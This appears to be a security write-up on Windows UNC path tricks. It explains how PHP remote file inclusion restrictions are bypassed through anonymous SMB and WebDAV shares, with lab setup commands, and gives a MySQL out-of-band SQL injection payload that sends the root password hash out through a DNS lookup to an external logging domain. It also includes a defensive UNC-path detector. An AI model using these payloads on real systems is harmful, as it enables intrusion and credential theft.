The Microsoft Windows UNC

The Microsoft Windows UNC, short for Universal Naming Convention or Uniform Naming Convention, specifies a common syntax to describe the location of a network resource, such as a shared file, directory, or printer. The UNC syntax for Windows systems has the generic form:

\\ComputerName\SharedFolder\Resource

Some Microsoft Windows interfaces also allow or require UNC syntax for WebDAV share access, rather than a URL. For this, the UNC syntax is extended with optional components that denote the use of SSL and a TCP/IP port number; a WebDAV URL of the form http[s]://HostName[:Port]/SharedFolder/Resource becomes:

\\HostName[@SSL][@Port]\SharedFolder\Resource

Vul1: Exploiting RFI in PHP Bypass Remote URL Inclusion Restriction

Overview

Via: http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html

A few days ago an article circulated on Twitter about exploiting remote file inclusion (RFI) in a PHP application and bypassing the remote URL inclusion restriction. It is a neat trick.

In the PHP configuration file, the allow_url_include directive is set to "Off" by default, which instructs PHP not to load remote HTTP or FTP URLs and hence prevents remote file inclusion attacks. But PHP does not block loading from SMB paths even if both allow_url_include and allow_url_fopen are set to "Off": a UNC path such as \\host\share\file is not a URL wrapper at all, so it is passed to the Windows filesystem, which resolves it over the network.

This trick exploits the characteristics of Windows UNC paths. Attack chain: UNC -> SMB -> data.

In addition to SMB, an unauthenticated WebDAV share can also be used.
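On the defensive side, an include() or LOAD_FILE() argument should be rejected before it is resolved if it is a UNC path of the form described above (including the @SSL and @Port WebDAV extension and the forward-slash spelling), not only if it is an http:// or ftp:// URL. The following Python is an added example and not code from the original post; the names UncPath, parse_unc and is_remote_include are my own, and the sample inputs are constructed around the lab address used later in the text.

```python
import re
from dataclasses import dataclass
from typing import Optional


@dataclass
class UncPath:
    host: str
    ssl: bool            # "@SSL" present: the WebClient talks HTTPS
    port: Optional[int]  # "@Port" present: explicit TCP port
    share: str
    resource: str


# Extended UNC form from the text: \\HostName[@SSL][@Port]\SharedFolder\Resource.
# Forward slashes are accepted too; Windows resolves //host/share the same way.
_UNC_RE = re.compile(
    r"^[\\/]{2}(?P<host>[^\\/@]+)(?P<ssl>@SSL)?(?:@(?P<port>\d{1,5}))?"
    r"[\\/](?P<share>[^\\/]+)(?:[\\/](?P<resource>.*))?$",
    re.IGNORECASE,
)
_URL_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)


def parse_unc(value: str) -> Optional[UncPath]:
    """Split a UNC path into its components, or return None if it is not one."""
    m = _UNC_RE.match(value.strip())
    if m is None:
        return None
    port = int(m.group("port")) if m.group("port") else None
    return UncPath(m.group("host"), m.group("ssl") is not None, port,
                   m.group("share"), m.group("resource") or "")


def is_remote_include(value: str) -> bool:
    """True if an include()/LOAD_FILE() argument would be fetched over the network:
    a URL wrapper (covered by allow_url_include) or a UNC path (not covered)."""
    v = value.strip()
    return v.startswith(("\\\\", "//")) or _URL_RE.match(v) is not None


# Constructed sample inputs; 192.168.0.111 is the lab address used in the text.
SAMPLES = [
    r"\\192.168.0.111\ethan\filename",  # SMB share from the Samba example
    r"\\192.168.0.111@SSL@8000\1\2",    # WebDAV over HTTPS with numeric names
    "//192.168.0.111/ethan/filename",   # forward-slash variant
    "pages/about.php",                  # ordinary relative include
]

if __name__ == "__main__":
    for v in SAMPLES:
        print(f"{'REMOTE' if is_remote_include(v) else 'local '} {v!r} {parse_unc(v)}")
```

A server-side check that calls is_remote_include() on the user-supplied value, and then confines the remaining relative path to the intended directory, closes the gap that allow_url_include alone leaves open.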

SMB

Configure a Samba server with anonymous read access (Linux machine).

In Kali Linux, install Samba with the following command:

apt-get install samba

Create SMB share directory:

mkdir /var/www/html/pub/

Configure permissions on newly created SMB share directory:

chmod 0555 /var/www/html/pub/
chown -R nobody:nogroup /var/www/html/pub/

Run the following command to clear the default content of the Samba server config file:

echo > /etc/samba/smb.conf

Put the following content in /etc/samba/smb.conf:

[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = indishell-lab
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes

[ethan]
path = /var/www/html/pub
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody

Now restart the Samba server to apply the new configuration specified in /etc/samba/smb.conf:

service smbd restart

Once the Samba server has restarted successfully, access the SMB share and make sure the server does not ask for credentials:

\\192.168.0.111\ethan\filename

WebDAV

Start a WebDAV service with Docker:

Use https://github.com/BytemarkHosting/docker-webdav. Put the file to be served in /root/WebDAV/data, but a username and password are required. :(

docker run -v /root/webdav:/var/lib/dav -e USERNAME=admin -e PASSWORD=admin -p 8000:80 --rm --name webdav bytemark/webdav

Alternatively, use https://github.com/idelsink/webdav-docker.

docker run --name=webdav -d -v /root/webdav:/webdav -p 8000:80 idelsink/webdav

The WebDAV client of Windows relies on the WebClient service (enabled by default). To access a WebDAV service through a UNC path, that service must be running first.

Notice: the Windows WebClient converts the path of a WebDAV request to uppercase, while Apache matches paths case-sensitively by default. This was discovered from the Apache log file: the uppercased path does not match and the request is rejected outright with a 403.

You can work around this by using purely numeric directory and file names, which have no case to change.

Vul2: MySQL OOB Injection

Overview

Via: https://osandamalith.com/2017/02/03/mysql-out-of-band-hacking

Out-of-band injection uses alternative channels to extract data from the server. These might be HTTP(S) requests, DNS resolutions, file systems, e-mails, etc., depending on the functionality of the back-end technology.

From the payloads provided by CEYE, it can be seen that OOB injection is very well researched for MSSQL and Oracle, but for MySQL and PostgreSQL it is limited. The payload provided by CEYE for MySQL is:

SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc'));

You can see that there are a lot of backslashes: inside a MySQL string literal, \\\\ is the escape sequence for \\, so the concatenated argument to LOAD_FILE() begins with the UNC prefix, and the extracted value becomes the hostname that the server tries to resolve.

Notice: this also exploits the characteristics of Windows UNC paths.

Limitations

The --secure-file-priv option sets the secure_file_priv system variable, which is used to limit the effect of data import and export operations, such as those performed by the LOAD DATA and SELECT ... INTO OUTFILE statements and the LOAD_FILE() function. When the variable names a directory, LOAD_FILE() can only read files inside that directory, and NULL disables these operations entirely, so a UNC path is refused in both cases; only an empty value leaves LOAD_FILE() unrestricted. Refer to the link: https://dev.mysql.com/doc/refman/5.7/en/server-options.html

Property                    Value
Command-Line Format         --secure-file-priv=dir_name
System Variable             secure_file_priv
Scope                       Global
Dynamic                     No
Type                        String
Default Value (>= 5.7.6)    platform specific
Default Value (<= 5.7.5)    empty string
Valid Values (>= 5.7.6)     empty string, dirname, NULL
Valid Values (<= 5.7.5)     empty string, dirname